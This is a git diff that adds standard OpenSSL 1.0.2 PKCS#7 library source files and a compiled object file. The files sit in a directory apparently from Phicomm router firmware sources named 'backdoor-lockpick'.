z4lAs`7ImkJzguN9j_Y+}u*9E?rLAw{Z>qMX-kPK3FXGw+KoIu_;#F9GU$Da10}4DW
ffr%?7&Y{bglOyuDW2*Z77iy84a+3O{u>Su5Et@{1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_enc.c
new file mode 100644
index 0000000..6983e01
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_enc.c
@@ -0,0 +1,75 @@
+/* crypto/pkcs7/pk7_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+
+PKCS7_in_bio(PKCS7 *p7, BIO *in);
+PKCS7_out_bio(PKCS7 *p7, BIO *out);
+
+PKCS7_add_signer(PKCS7 *p7, X509 *cert, EVP_PKEY *key);
+PKCS7_cipher(PKCS7 *p7, EVP_CIPHER *cipher);
+
+PKCS7_Init(PKCS7 *p7);
+PKCS7_Update(PKCS7 *p7);
+PKCS7_Finish(PKCS7 *p7);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.c
new file mode 100644
index 0000000..c773812
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.c
@@ -0,0 +1,643 @@
+/* crypto/pkcs7/pk7_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include "asn1_locl.h"
+
+long PKCS7_ctrl(PKCS7 *p7, int cmd, long larg, char *parg)
+{
+    int nid;
+    long ret;
+
+    nid = OBJ_obj2nid(p7->type);
+
+    switch (cmd) {
+    case PKCS7_OP_SET_DETACHED_SIGNATURE:
+        if (nid == NID_pkcs7_signed) {
+            ret = p7->detached = (int)larg;
+            if (ret && PKCS7_type_is_data(p7->d.sign->contents)) {
+                ASN1_OCTET_STRING *os;
+                os = p7->d.sign->contents->d.data;
+                ASN1_OCTET_STRING_free(os);
+                p7->d.sign->contents->d.data = NULL;
+            }
+        } else {
+            PKCS7err(PKCS7_F_PKCS7_CTRL,
+                     PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE);
+            ret = 0;
+        }
+        break;
+    case PKCS7_OP_GET_DETACHED_SIGNATURE:
+        if (nid == NID_pkcs7_signed) {
+            if (!p7->d.sign || !p7->d.sign->contents->d.ptr)
+                ret = 1;
+            else
+                ret = 0;
+
+            p7->detached = ret;
+        } else {
+            PKCS7err(PKCS7_F_PKCS7_CTRL,
+                     PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE);
+            ret = 0;
+        }
+
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_CTRL, PKCS7_R_UNKNOWN_OPERATION);
+        ret = 0;
+    }
+    return (ret);
+}
+
+int PKCS7_content_new(PKCS7 *p7, int type)
+{
+    PKCS7 *ret = NULL;
+
+    if ((ret = PKCS7_new()) == NULL)
+        goto err;
+    if (!PKCS7_set_type(ret, type))
+        goto err;
+    if (!PKCS7_set_content(p7, ret))
+        goto err;
+
+    return (1);
+ err:
+    if (ret != NULL)
+        PKCS7_free(ret);
+    return (0);
+}
+
+int PKCS7_set_content(PKCS7 *p7, PKCS7 *p7_data)
+{
+    int i;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signed:
+        if (p7->d.sign->contents != NULL)
+            PKCS7_free(p7->d.sign->contents);
+        p7->d.sign->contents = p7_data;
+        break;
+    case NID_pkcs7_digest:
+        if (p7->d.digest->contents != NULL)
+            PKCS7_free(p7->d.digest->contents);
+        p7->d.digest->contents = p7_data;
+        break;
+    case NID_pkcs7_data:
+    case NID_pkcs7_enveloped:
+    case NID_pkcs7_signedAndEnveloped:
+    case NID_pkcs7_encrypted:
+    default:
+        PKCS7err(PKCS7_F_PKCS7_SET_CONTENT, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
+        goto err;
+    }
+    return (1);
+ err:
+    return (0);
+}
+
+int PKCS7_set_type(PKCS7 *p7, int type)
+{
+    ASN1_OBJECT *obj;
+
+    /*
+     * PKCS7_content_free(p7);
+     */
+    obj = OBJ_nid2obj(type);    /* will not fail */
+
+    switch (type) {
+    case NID_pkcs7_signed:
+        p7->type = obj;
+        if ((p7->d.sign = PKCS7_SIGNED_new()) == NULL)
+            goto err;
+        if (!ASN1_INTEGER_set(p7->d.sign->version, 1)) {
+            PKCS7_SIGNED_free(p7->d.sign);
+            p7->d.sign = NULL;
+            goto err;
+        }
+        break;
+    case NID_pkcs7_data:
+        p7->type = obj;
+        if ((p7->d.data = M_ASN1_OCTET_STRING_new()) == NULL)
+            goto err;
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        p7->type = obj;
+        if ((p7->d.signed_and_enveloped = PKCS7_SIGN_ENVELOPE_new())
+            == NULL)
+            goto err;
+        ASN1_INTEGER_set(p7->d.signed_and_enveloped->version, 1);
+        if (!ASN1_INTEGER_set(p7->d.signed_and_enveloped->version, 1))
+            goto err;
+        p7->d.signed_and_enveloped->enc_data->content_type
+            = OBJ_nid2obj(NID_pkcs7_data);
+        break;
+    case NID_pkcs7_enveloped:
+        p7->type = obj;
+        if ((p7->d.enveloped = PKCS7_ENVELOPE_new())
+            == NULL)
+            goto err;
+        if (!ASN1_INTEGER_set(p7->d.enveloped->version, 0))
+            goto err;
+        p7->d.enveloped->enc_data->content_type = OBJ_nid2obj(NID_pkcs7_data);
+        break;
+    case NID_pkcs7_encrypted:
+        p7->type = obj;
+        if ((p7->d.encrypted = PKCS7_ENCRYPT_new())
+            == NULL)
+            goto err;
+        if (!ASN1_INTEGER_set(p7->d.encrypted->version, 0))
+            goto err;
+        p7->d.encrypted->enc_data->content_type = OBJ_nid2obj(NID_pkcs7_data);
+        break;
+
+    case NID_pkcs7_digest:
+        p7->type = obj;
+        if ((p7->d.digest = PKCS7_DIGEST_new())
+            == NULL)
+            goto err;
+        if (!ASN1_INTEGER_set(p7->d.digest->version, 0))
+            goto err;
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_SET_TYPE, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
+        goto err;
+    }
+    return (1);
+ err:
+    return (0);
+}
+
+int PKCS7_set0_type_other(PKCS7 *p7, int type, ASN1_TYPE *other)
+{
+    p7->type = OBJ_nid2obj(type);
+    p7->d.other = other;
+    return 1;
+}
+
+int PKCS7_add_signer(PKCS7 *p7, PKCS7_SIGNER_INFO *psi)
+{
+    int i, j, nid;
+    X509_ALGOR *alg;
+    STACK_OF(PKCS7_SIGNER_INFO) *signer_sk;
+    STACK_OF(X509_ALGOR) *md_sk;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signed:
+        signer_sk = p7->d.sign->signer_info;
+        md_sk = p7->d.sign->md_algs;
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        signer_sk = p7->d.signed_and_enveloped->signer_info;
+        md_sk = p7->d.signed_and_enveloped->md_algs;
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_ADD_SIGNER, PKCS7_R_WRONG_CONTENT_TYPE);
+        return (0);
+    }
+
+    nid = OBJ_obj2nid(psi->digest_alg->algorithm);
+
+    /* If the digest is not currently listed, add it */
+    j = 0;
+    for (i = 0; i < sk_X509_ALGOR_num(md_sk); i++) {
+        alg = sk_X509_ALGOR_value(md_sk, i);
+        if (OBJ_obj2nid(alg->algorithm) == nid) {
+            j = 1;
+            break;
+        }
+    }
+    if (!j) {                   /* we need to add another algorithm */
+        if (!(alg = X509_ALGOR_new())
+            || !(alg->parameter = ASN1_TYPE_new())) {
+            X509_ALGOR_free(alg);
+            PKCS7err(PKCS7_F_PKCS7_ADD_SIGNER, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+        alg->algorithm = OBJ_nid2obj(nid);
+        alg->parameter->type = V_ASN1_NULL;
+        if (!sk_X509_ALGOR_push(md_sk, alg)) {
+            X509_ALGOR_free(alg);
+            return 0;
+        }
+    }
+
+    if (!sk_PKCS7_SIGNER_INFO_push(signer_sk, psi))
+        return 0;
+    return (1);
+}
+
+int PKCS7_add_certificate(PKCS7 *p7, X509 *x509)
+{
+    int i;
+    STACK_OF(X509) **sk;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signed:
+        sk = &(p7->d.sign->cert);
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        sk = &(p7->d.signed_and_enveloped->cert);
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_ADD_CERTIFICATE, PKCS7_R_WRONG_CONTENT_TYPE);
+        return (0);
+    }
+
+    if (*sk == NULL)
+        *sk = sk_X509_new_null();
+    if (*sk == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_ADD_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    CRYPTO_add(&x509->references, 1, CRYPTO_LOCK_X509);
+    if (!sk_X509_push(*sk, x509)) {
+        X509_free(x509);
+        return 0;
+    }
+    return (1);
+}
+
+int PKCS7_add_crl(PKCS7 *p7, X509_CRL *crl)
+{
+    int i;
+    STACK_OF(X509_CRL) **sk;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signed:
+        sk = &(p7->d.sign->crl);
+        break;
+    case NID_pkcs7_signedAndEnveloped:
+        sk = &(p7->d.signed_and_enveloped->crl);
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_ADD_CRL, PKCS7_R_WRONG_CONTENT_TYPE);
+        return (0);
+    }
+
+    if (*sk == NULL)
+        *sk = sk_X509_CRL_new_null();
+    if (*sk == NULL) {
+        PKCS7err(PKCS7_F_PKCS7_ADD_CRL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    CRYPTO_add(&crl->references, 1, CRYPTO_LOCK_X509_CRL);
+    if (!sk_X509_CRL_push(*sk, crl)) {
+        X509_CRL_free(crl);
+        return 0;
+    }
+    return (1);
+}
+
+int PKCS7_SIGNER_INFO_set(PKCS7_SIGNER_INFO *p7i, X509 *x509, EVP_PKEY *pkey,
+                          const EVP_MD *dgst)
+{
+    int ret;
+
+    /* We now need to add another PKCS7_SIGNER_INFO entry */
+    if (!ASN1_INTEGER_set(p7i->version, 1))
+        goto err;
+    if (!X509_NAME_set(&p7i->issuer_and_serial->issuer,
+                       X509_get_issuer_name(x509)))
+        goto err;
+
+    /*
+     * because ASN1_INTEGER_set is used to set a 'long' we will do things the
+     * ugly way.
+     */
+    M_ASN1_INTEGER_free(p7i->issuer_and_serial->serial);
+    if (!(p7i->issuer_and_serial->serial =
+          M_ASN1_INTEGER_dup(X509_get_serialNumber(x509))))
+        goto err;
+
+    /* lets keep the pkey around for a while */
+    CRYPTO_add(&pkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    p7i->pkey = pkey;
+
+    /* Set the algorithms */
+
+    X509_ALGOR_set0(p7i->digest_alg, OBJ_nid2obj(EVP_MD_type(dgst)),
+                    V_ASN1_NULL, NULL);
+
+    if (pkey->ameth && pkey->ameth->pkey_ctrl) {
+        ret = pkey->ameth->pkey_ctrl(pkey, ASN1_PKEY_CTRL_PKCS7_SIGN, 0, p7i);
+        if (ret > 0)
+            return 1;
+        if (ret != -2) {
+            PKCS7err(PKCS7_F_PKCS7_SIGNER_INFO_SET,
+                     PKCS7_R_SIGNING_CTRL_FAILURE);
+            return 0;
+        }
+    }
+    PKCS7err(PKCS7_F_PKCS7_SIGNER_INFO_SET,
+             PKCS7_R_SIGNING_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+ err:
+    return 0;
+}
+
+PKCS7_SIGNER_INFO *PKCS7_add_signature(PKCS7 *p7, X509 *x509, EVP_PKEY *pkey,
+                                       const EVP_MD *dgst)
+{
+    PKCS7_SIGNER_INFO *si = NULL;
+
+    if (dgst == NULL) {
+        int def_nid;
+        if (EVP_PKEY_get_default_digest_nid(pkey, &def_nid) <= 0)
+            goto err;
+        dgst = EVP_get_digestbynid(def_nid);
+        if (dgst == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_ADD_SIGNATURE, PKCS7_R_NO_DEFAULT_DIGEST);
+            goto err;
+        }
+    }
+
+    if ((si = PKCS7_SIGNER_INFO_new()) == NULL)
+        goto err;
+    if (!PKCS7_SIGNER_INFO_set(si, x509, pkey, dgst))
+        goto err;
+    if (!PKCS7_add_signer(p7, si))
+        goto err;
+    return (si);
+ err:
+    if (si)
+        PKCS7_SIGNER_INFO_free(si);
+    return (NULL);
+}
+
+int PKCS7_set_digest(PKCS7 *p7, const EVP_MD *md)
+{
+    if (PKCS7_type_is_digest(p7)) {
+        if (!(p7->d.digest->md->parameter = ASN1_TYPE_new())) {
+            PKCS7err(PKCS7_F_PKCS7_SET_DIGEST, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        p7->d.digest->md->parameter->type = V_ASN1_NULL;
+        p7->d.digest->md->algorithm = OBJ_nid2obj(EVP_MD_nid(md));
+        return 1;
+    }
+
+    PKCS7err(PKCS7_F_PKCS7_SET_DIGEST, PKCS7_R_WRONG_CONTENT_TYPE);
+    return 1;
+}
+
+STACK_OF(PKCS7_SIGNER_INFO) *PKCS7_get_signer_info(PKCS7 *p7)
+{
+    if (PKCS7_type_is_signed(p7)) {
+        return (p7->d.sign->signer_info);
+    } else if (PKCS7_type_is_signedAndEnveloped(p7)) {
+        return (p7->d.signed_and_enveloped->signer_info);
+    } else
+        return (NULL);
+}
+
+void PKCS7_SIGNER_INFO_get0_algs(PKCS7_SIGNER_INFO *si, EVP_PKEY **pk,
+                                 X509_ALGOR **pdig, X509_ALGOR **psig)
+{
+    if (pk)
+        *pk = si->pkey;
+    if (pdig)
+        *pdig = si->digest_alg;
+    if (psig)
+        *psig = si->digest_enc_alg;
+}
+
+void PKCS7_RECIP_INFO_get0_alg(PKCS7_RECIP_INFO *ri, X509_ALGOR **penc)
+{
+    if (penc)
+        *penc = ri->key_enc_algor;
+}
+
+PKCS7_RECIP_INFO *PKCS7_add_recipient(PKCS7 *p7, X509 *x509)
+{
+    PKCS7_RECIP_INFO *ri;
+
+    if ((ri = PKCS7_RECIP_INFO_new()) == NULL)
+        goto err;
+    if (!PKCS7_RECIP_INFO_set(ri, x509))
+        goto err;
+    if (!PKCS7_add_recipient_info(p7, ri))
+        goto err;
+    return ri;
+ err:
+    if (ri)
+        PKCS7_RECIP_INFO_free(ri);
+    return NULL;
+}
+
+int PKCS7_add_recipient_info(PKCS7 *p7, PKCS7_RECIP_INFO *ri)
+{
+    int i;
+    STACK_OF(PKCS7_RECIP_INFO) *sk;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signedAndEnveloped:
+        sk = p7->d.signed_and_enveloped->recipientinfo;
+        break;
+    case NID_pkcs7_enveloped:
+        sk = p7->d.enveloped->recipientinfo;
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_ADD_RECIPIENT_INFO,
+                 PKCS7_R_WRONG_CONTENT_TYPE);
+        return (0);
+    }
+
+    if (!sk_PKCS7_RECIP_INFO_push(sk, ri))
+        return 0;
+    return (1);
+}
+
+int PKCS7_RECIP_INFO_set(PKCS7_RECIP_INFO *p7i, X509 *x509)
+{
+    int ret;
+    EVP_PKEY *pkey = NULL;
+    if (!ASN1_INTEGER_set(p7i->version, 0))
+        return 0;
+    if (!X509_NAME_set(&p7i->issuer_and_serial->issuer,
+                       X509_get_issuer_name(x509)))
+        return 0;
+
+    M_ASN1_INTEGER_free(p7i->issuer_and_serial->serial);
+    if (!(p7i->issuer_and_serial->serial =
+          M_ASN1_INTEGER_dup(X509_get_serialNumber(x509))))
+        return 0;
+
+    pkey = X509_get_pubkey(x509);
+
+    if (!pkey || !pkey->ameth || !pkey->ameth->pkey_ctrl) {
+        PKCS7err(PKCS7_F_PKCS7_RECIP_INFO_SET,
+                 PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        goto err;
+    }
+
+    ret = pkey->ameth->pkey_ctrl(pkey, ASN1_PKEY_CTRL_PKCS7_ENCRYPT, 0, p7i);
+    if (ret == -2) {
+        PKCS7err(PKCS7_F_PKCS7_RECIP_INFO_SET,
+                 PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        goto err;
+    }
+    if (ret <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_RECIP_INFO_SET,
+                 PKCS7_R_ENCRYPTION_CTRL_FAILURE);
+        goto err;
+    }
+
+    EVP_PKEY_free(pkey);
+
+    CRYPTO_add(&x509->references, 1, CRYPTO_LOCK_X509);
+    p7i->cert = x509;
+
+    return 1;
+
+ err:
+    if (pkey)
+        EVP_PKEY_free(pkey);
+    return 0;
+}
+
+X509 *PKCS7_cert_from_signer_info(PKCS7 *p7, PKCS7_SIGNER_INFO *si)
+{
+    if (PKCS7_type_is_signed(p7))
+        return (X509_find_by_issuer_and_serial(p7->d.sign->cert,
+                                               si->issuer_and_serial->issuer,
+                                               si->
+                                               issuer_and_serial->serial));
+    else
+        return (NULL);
+}
+
+int PKCS7_set_cipher(PKCS7 *p7, const EVP_CIPHER *cipher)
+{
+    int i;
+    PKCS7_ENC_CONTENT *ec;
+
+    i = OBJ_obj2nid(p7->type);
+    switch (i) {
+    case NID_pkcs7_signedAndEnveloped:
+        ec = p7->d.signed_and_enveloped->enc_data;
+        break;
+    case NID_pkcs7_enveloped:
+        ec = p7->d.enveloped->enc_data;
+        break;
+    default:
+        PKCS7err(PKCS7_F_PKCS7_SET_CIPHER, PKCS7_R_WRONG_CONTENT_TYPE);
+        return (0);
+    }
+
+    /* Check cipher OID exists and has data in it */
+    i = EVP_CIPHER_type(cipher);
+    if (i == NID_undef) {
+        PKCS7err(PKCS7_F_PKCS7_SET_CIPHER,
+                 PKCS7_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER);
+        return (0);
+    }
+
+    ec->cipher = cipher;
+    return 1;
+}
+
+int PKCS7_stream(unsigned char ***boundary, PKCS7 *p7)
+{
+    ASN1_OCTET_STRING *os = NULL;
+
+    switch (OBJ_obj2nid(p7->type)) {
+    case NID_pkcs7_data:
+        os = p7->d.data;
+        break;
+
+    case NID_pkcs7_signedAndEnveloped:
+        os = p7->d.signed_and_enveloped->enc_data->enc_data;
+        if (os == NULL) {
+            os = M_ASN1_OCTET_STRING_new();
+            p7->d.signed_and_enveloped->enc_data->enc_data = os;
+        }
+        break;
+
+    case NID_pkcs7_enveloped:
+        os = p7->d.enveloped->enc_data->enc_data;
+        if (os == NULL) {
+            os = M_ASN1_OCTET_STRING_new();
+            p7->d.enveloped->enc_data->enc_data = os;
+        }
+        break;
+
+    case NID_pkcs7_signed:
+        os = p7->d.sign->contents->d.data;
+        break;
+
+    default:
+        os = NULL;
+        break;
+    }
+
+    if (os == NULL)
+        return 0;
+
+    os->flags |= ASN1_STRING_FLAG_NDEF;
+    *boundary = &os->data;
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..3bd55a9bb9fb7c9f52a34bc0823c0c572695516d
GIT binary patch
literal 11752
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
